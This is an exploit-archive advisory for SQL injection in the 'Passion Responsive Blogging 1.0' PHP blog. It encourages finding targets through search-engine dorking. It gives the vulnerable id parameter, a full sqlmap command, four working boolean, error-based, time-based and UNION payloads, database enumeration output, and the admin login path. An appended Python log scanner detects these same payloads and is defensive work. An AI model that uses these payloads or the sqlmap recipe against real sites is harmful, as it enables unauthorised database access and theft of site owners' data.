==========================================================================================
| # Title     : Passion Responsive Blogging 1.0 SQL Injection Vulnerability
| # Author    : indoushka
| # Tested on : Windows 10 Fr(Pro) / browser : Mozilla Firefox 129.0.1 (64 bits)
| # Vendor    : https://code-projects.org/responsive-blog-site-in-php-with-source-code/
==========================================================================================

poc :

[+] Dorking in Google or another search engine.

[+] Use payload : /bmacblog/single.php?id=1 <==== inject here

[+] E:\sqlmap>python sqlmap.py -u https://www.127.0.0.1.com/bmacblog/single.php?id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 9732=9732-- jEuI

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 2112 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(2112=2112,1))),0x717a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- WxeZ

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4899 FROM (SELECT(SLEEP(5)))Buaa)-- cfil

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: id=-6131' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7176717a71,0x7067554f5a4b435a75514461626d774c4f517045565a5a6d776e6e766276754e43576176794c5974,0x717a6b7071),NULL,NULL,NULL,NULL-- -
---
[23:52:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[23:52:32] [INFO] fetching database names
available databases [2]:
[*] bmac_blog_admin_db
[*] information_schema

[+] Login : /blogadmin

Greetings to :
==========================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr
==========================================================================================
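For defenders reviewing web server logs, the following added example (not part of the original advisory) flags requests to /bmacblog/single.php whose id parameter is not a plain integer and labels them with the injection types listed in the sqlmap output. The Apache combined log format, the function names and the sample log lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter are from the advisory; Apache combined log format is assumed.
TARGET_PATH = "/bmacblog/single.php"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')

# Labels mirror the four injection types listed in the sqlmap output above.
SIGNATURES = {
    "union": re.compile(r"\bunion\b.+\bselect\b", re.I | re.S),
    "time-based": re.compile(r"\bsleep\s*\(", re.I),
    "error-based": re.compile(r"information_schema|floor\s*\(\s*rand", re.I),
    "boolean": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
}

def classify_id(value):
    """Return [] for a plain numeric id, otherwise a list of reason labels."""
    if re.fullmatch(r"\d{1,10}", value):
        return []
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return hits or ["non-numeric"]

def scan(lines):
    """Return (client_ip, decoded_id, reasons) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m.group("target"))
        if url.path != TARGET_PATH:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            reasons = classify_id(value)  # parse_qs has already URL-decoded value
            if reasons:
                findings.append((m.group("ip"), value, reasons))
    return findings

# Constructed sample lines (documentation-range addresses); the UNION value is shortened.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET /bmacblog/single.php?id=1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2025:10:00:05 +0000] "GET /bmacblog/single.php?id=1%27%20AND%209732%3D9732--%20jEuI HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2025:10:00:06 +0000] "GET /bmacblog/single.php?id=1%27%20AND%20(SELECT%204899%20FROM%20(SELECT(SLEEP(5)))Buaa)--%20cfil HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2025:10:00:07 +0000] "GET /bmacblog/single.php?id=-6131%27%20UNION%20ALL%20SELECT%20NULL,NULL--%20- HTTP/1.1" 200 5120',
    '198.51.100.8 - - [01/Jan/2025:10:00:09 +0000] "GET /bmacblog/single.php?id=abc HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

The integer allowlist is the primary signal; the signature labels only help triage and do not need to be exhaustive.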